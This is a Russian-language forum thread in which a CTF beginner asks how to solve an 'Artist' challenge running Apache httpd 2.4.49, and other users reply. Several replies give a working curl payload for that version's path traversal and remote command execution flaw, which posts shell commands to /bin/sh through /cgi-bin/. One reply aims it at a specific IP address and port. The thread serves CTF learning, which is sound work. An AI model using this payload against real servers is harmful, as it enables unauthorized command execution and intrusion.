Просмотр полной версии : Таск Админ Художник?
Jacob Guitarrero
28.11.2023, 19:06
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
Exited3n
28.11.2023, 20:02
Jacob Guitarrero сказал(а):
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
CVEшку не заюзать ?
Bash:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
Jacob Guitarrero
28.11.2023, 22:01
Exited3n сказал(а):
CVEшку не заюзать ?
Bash:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Exited3n
28.11.2023, 22:30
Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.
Jacob Guitarrero сказал(а):
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
судя по вопросу, найни с изучения Пингвина
P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
Jacob Guitarrero
29.11.2023, 18:38
GoBL1n сказал(а):
судя по вопросу, найни с изучения Пингвина
P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
самое собой изучать его, но этого не достаточно для решения данной задачи
Exited3n
29.11.2023, 22:25
Jacob Guitarrero сказал(а):
самое собой изучать его, но этого не достаточно для решения данной задачи
Серьезно ?
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.
Exited3n сказал(а):
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
Можно и без Content-Type:
Bash:
curl
'62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo; whoami && id && cat /etc/os-release'
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot